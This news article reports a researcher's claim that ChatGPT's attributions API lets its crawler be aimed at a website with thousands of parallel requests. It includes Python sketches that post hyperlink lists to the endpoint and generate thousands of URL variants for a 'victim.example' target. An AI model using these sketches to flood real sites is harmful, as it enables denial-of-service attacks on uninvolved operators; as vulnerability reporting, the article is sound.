OpenAI’s ChatGPT Crawler Can Be Used to Trigger DDoS Attack on Websites, Researcher Claims

OpenAI’s ChatGPT application programming interface (API) has a vulnerability that can be exploited to launch a distributed denial of service (DDoS) attack on websites, according to details shared by a cybersecurity researcher. The ChatGPT crawler can reportedly be made to send thousands of network requests to a single website. The researcher, who rated the vulnerability as high severity, claims it remains unpatched and that the company has not said when the issue will be fixed.

ChatGPT API Allows Multiple Parallel Network Requests to Same Website

In a GitHub post shared earlier this month, Germany-based security researcher Benjamin Flesch detailed the vulnerability in the ChatGPT API. The researcher also posted proof-of-concept code that triggers 50 parallel HTTP requests to a test website, demonstrating how the bug can be used to mount a DDoS attack.

According to Flesch, the vulnerability surfaces when the API handles HTTP POST requests to https://chatgpt.com/backend-api/attributions. POST is an HTTP method for sending data to a server, typically used by API endpoints to create new resources. When processing such a request, the ChatGPT API expects a list of hyperlinks in the URL parameter.
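
Based on that description, the shape of such a request might resemble the Python sketch below. This is a minimal, hypothetical sketch: only the endpoint path and the idea of submitting a list of hyperlinks come from the report, while the JSON field name and other details are assumptions.

```python
# Hypothetical sketch of the kind of request described in the report.
# Only the endpoint path and the idea of a hyperlink list come from the
# write-up; the JSON field name ("urls") and other details are assumptions.
import requests

ATTRIBUTIONS_ENDPOINT = "https://chatgpt.com/backend-api/attributions"

def submit_hyperlinks(hyperlinks):
    """POST a list of hyperlinks to the attributions endpoint.

    Per the report, the ChatGPT crawler then fetches each hyperlink,
    issuing its requests in parallel.
    """
    payload = {"urls": hyperlinks}  # assumed field name
    response = requests.post(ATTRIBUTIONS_ENDPOINT, json=payload, timeout=30)
    return response.status_code
```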

In what appears to be a flaw in its API, OpenAI does not check whether a hyperlink to the same resource appears multiple times in the list, according to the researcher. Since hyperlinks to the same website can be written in many different ways, this results in the crawler sending multiple parallel network requests to that website. Additionally, Flesch claims OpenAI does not enforce a limit on the maximum number of hyperlinks that can be added to the URL parameter and sent in a single request.
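
To illustrate why that matters, the sketch below packs many syntactically different hyperlinks that all point at the same site into a single list; the specific variant patterns are illustrative assumptions rather than details taken from the proof of concept.

```python
# Illustrative sketch of the duplication issue: the same site written in
# many syntactically different ways. The variant patterns are assumptions
# chosen for illustration, not taken from the proof of concept.
def url_variants(domain: str, count: int) -> list[str]:
    """Return `count` distinct-looking hyperlinks that all resolve to the
    same site, varying only letter case and query strings."""
    variants = []
    i = 0
    while len(variants) < count:
        variants.append(f"https://{domain}/?v={i}")          # unique query string
        variants.append(f"https://{domain.upper()}/?v={i}")  # same host, different case
        i += 1
    return variants[:count]

# With no server-side deduplication and no cap on list length, a single
# POST carrying this list would fan out into `count` crawler fetches of
# the same target.
links = url_variants("victim.example", 5000)
```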

As a result, a malicious actor could potentially direct thousands of crawler hits at a website, quickly overwhelming its server. The security researcher assigned the vulnerability a high-severity CVSS rating of 8.6, since it is network-based, has low attack complexity, and requires no privileges or user interaction, yet can cause a high impact on availability.
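
For context, one CVSS v3.1 vector consistent with that description and an 8.6 base score would be CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H: network attack vector, low attack complexity, no privileges required, no user interaction, changed scope (the availability impact lands on the targeted website rather than on the vulnerable API itself), and high availability impact with no confidentiality or integrity impact. Whether this matches the exact vector the researcher assigned is an assumption based on the properties described above.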

Flesch claimed to have contacted both OpenAI and Microsoft (whose servers host the ChatGPT API) about the vulnerability multiple times through different channels after discovering the bug in January. He said he reported it to the OpenAI security team, to OpenAI employees, to the OpenAI data privacy officer, as well as to Microsoft’s security and Azure network operations teams.

Despite these attempts to flag the vulnerability, the researcher claimed that the issue has neither been resolved nor acknowledged by the AI firm. Gadgets 360 staff members were not able to verify the presence of the bug on the chatbot.